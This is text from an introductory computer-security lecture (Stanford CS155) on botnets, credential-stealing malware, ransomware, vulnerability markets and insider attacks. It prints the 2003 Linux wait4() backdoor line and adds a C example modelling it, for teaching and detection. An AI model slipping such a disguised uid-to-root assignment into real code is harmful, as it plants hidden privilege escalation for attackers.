01 Intro


https://crypto.stanford.edu/cs155

CS155

Computer Security

Course overview
Dan Boneh
The computer security problem
• Lots of buggy software
• Social engineering is very effective

• Money can be made from finding and exploiting vulns.

1. Marketplace for vulnerabilities

2. Marketplace for owned machines (PPI)

3. Many methods to profit from owned machines


current state of computer security
Lots of vulnerability disclosures (2015)

source: www.cvedetails.com/top-50-products.php?year=2016


Vulnerable applications being exploited

Source: Kaspersky Security Bulletin 2015


Mobile malware (Nov. 2013 – Oct. 2014)

The rise of mobile banking Trojans (Kaspersky Security Bulletin 2014)
Introduction

Sample attacks

Why own client machines:
1. IP address and bandwidth stealing
Attacker’s goal: look like a random Internet user

Use the IP address of the infected machine or phone for:

• Spam (e.g. the Storm botnet)
  Spamalytics: 1 in 12M pharma spams leads to a purchase;
  1 in 260K greeting-card spams leads to an infection

• Denial of Service services: 1 hour ($20), 24 hours ($100)

• Click fraud (e.g. Clickbot.a)
Why own machines:
2. Steal user credentials and inject ads
keylog for banking passwords, web passwords, gaming passwords.
Example: SilentBanker (and many like it)

1. User requests login page
2. Bank sends login page
3. Malware injects the JavaScript needed to log in
4. When the user submits information, it is also sent to the attacker

Similar mechanism used by the Zeus botnet
Man-in-the-Browser (MITB)
Lots of financial malware

• size: 3.5 KB
• spread via email attachments
• also found on home routers

Source: Kaspersky Security Bulletin 2015


Users attacked: stats

≈ 300,000 users/month worldwide
A worldwide problem

Source: Kaspersky Security Bulletin 2015


Why own machines: 3. Ransomware

CryptoWall (2014-)
• targets Windows
• spread by spam emails

≈ 200,000 machines in 2015


A worldwide problem.

Why own machines:
4. Spread to isolated systems
Example: Stuxnet

Windows infection ⇒
Siemens PCS 7 SCADA control software on Windows ⇒
Siemens device controller on isolated network

More on this later in the course
Server-side attacks
• Financial data theft: often credit card numbers
– Example: Target attack (2013), ≈ 140M CC numbers stolen
– Many similar (smaller) attacks since 2000

• Political motivation:
– DNC, Tunisia Facebook (Feb. 2011), GitHub (Mar. 2015)

• Infect visiting users


Types of data stolen (2012-2015)

Source: California breach notification report, 2015


Example: Mpack
• PHP-based tools installed on compromised web sites
– Embedded as an iframe on the infected page
– Infects browsers that visit the site
• Features
– management console provides stats on infection rates
– Sold for several hundred dollars
– Customer care can be purchased: one-year support contract
• Impact: 500,000 infected sites (compromised via SQL injection)
– Several defenses: e.g. Google Safe Browsing
Insider attacks: example
Hidden trap door in Linux (Nov. 2003)
– Allows attacker to take over a computer
– Practically undetectable change (uncovered via CVS logs)

Inserted line in wait4():

    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;

Looks like a standard error check, but …

See: http://lwn.net/Articles/57135/
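To make the slide's point concrete, here is an added C example (not from the slides or from the kernel) that models the inserted line with a constructed task struct and constructed flag values: the assignment form silently sets uid to 0 and never returns -EINVAL, while the intended comparison form does neither.

```c
#include <errno.h>
#include <stdio.h>

/* Toy stand-ins for the kernel's task struct and wait4() option flags.
 * These are constructed for the example and are not the real kernel definitions. */
#define __WCLONE 0x80000000u
#define __WALL   0x40000000u

struct task { unsigned int uid; };

/* The inserted line as shown on the slide. '=' is an assignment: it sets the
 * calling task's uid to 0 (root) and then evaluates to 0, so the condition is
 * always false and -EINVAL is never returned. The extra parentheses around the
 * assignment also silence gcc's "suggest parentheses around assignment used as
 * truth value" warning, which is why it read like an ordinary error check. */
int backdoored_check(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
    return retval;
}

/* The same line written as a genuine check: '==' compares and leaves uid alone. */
int correct_check(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid == 0))
        retval = -EINVAL;
    return retval;
}

int main(void)
{
    struct task a = { .uid = 1000 }, b = { .uid = 1000 };

    backdoored_check(&a, __WCLONE|__WALL);
    correct_check(&b, __WCLONE|__WALL);

    /* Prints "backdoored: uid 1000 -> 0, correct: uid 1000 -> 1000" */
    printf("backdoored: uid 1000 -> %u, correct: uid 1000 -> %u\n", a.uid, b.uid);
    return 0;
}
```

Compiling with -Wall does not flag the backdoored line, so a review tool that treats any assignment inside an if condition as suspicious, regardless of parentheses, is the practical detection.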
Many more examples
• Access to SIPRnet and a CD-RW: 260,000 cables ⇒ Wikileaks

• SysAdmin for city of SF government.
  Changed passwords, locking out city from router access

• Inside logic bomb took down 2000 UBS servers

Can security technology help?
How companies lose data

Breach causes shown: insider error, lost/stolen laptops, insider attack, malware/phishing

How do we have this data?

Source: California breach notification report, 2015


Introduction

The Marketplace for


Vulnerabilities

Marketplace for Vulnerabilities
Option 1: bug bounty programs (many)
• Google Vulnerability Reward Program: up to $31,337
• Microsoft Bounty Program: up to $100K
• Apple Bug Bounty program: up to $200K (secure boot firmware)
• Pwn2Own competition: $15K

Option 2:
• Zero day initiative (ZDI), iDefense (accenture): up to $25K
• Zerodium: $1.5M for iOS10, $200K for Android 7 (Sep. 2016)
Example: Mozilla

Marketplace for Vulnerabilities
Option 3: black market

… and even up to $1.5M

Source: Andy Greenberg (Forbes, 3/23/2012)


Marketplace for owned machines
Pay-per-install (PPI) services

Clients (spam, keylogger, bot) → PPI service → Victims

PPI operation:
1. Own victim’s machine
2. Download and install client’s code
3. Charge client

Cost: US: $100-180 / 1000 machines
      Asia: $7-8 / 1000 machines

Source: Caballero et al. (www.icir.org/vern/papers/ppi-usesec11.pdf)
This course
Goals:

• Be aware of exploit techniques

• Learn to defend and avoid common exploits

• Learn to architect secure systems

This course
Part 1: basics (architecting for security)
• Securing apps, OS, and legacy code
Isolation, authentication, and access control
Part 2: Web security (defending against a web attacker)
• Building robust web sites, understand the browser security model
Part 3: network security (defending against a network attacker)
• Monitoring and architecting secure networks.
Part 4: securing mobile applications
Don’t try this at home!

Ken Thompson’s clever Trojan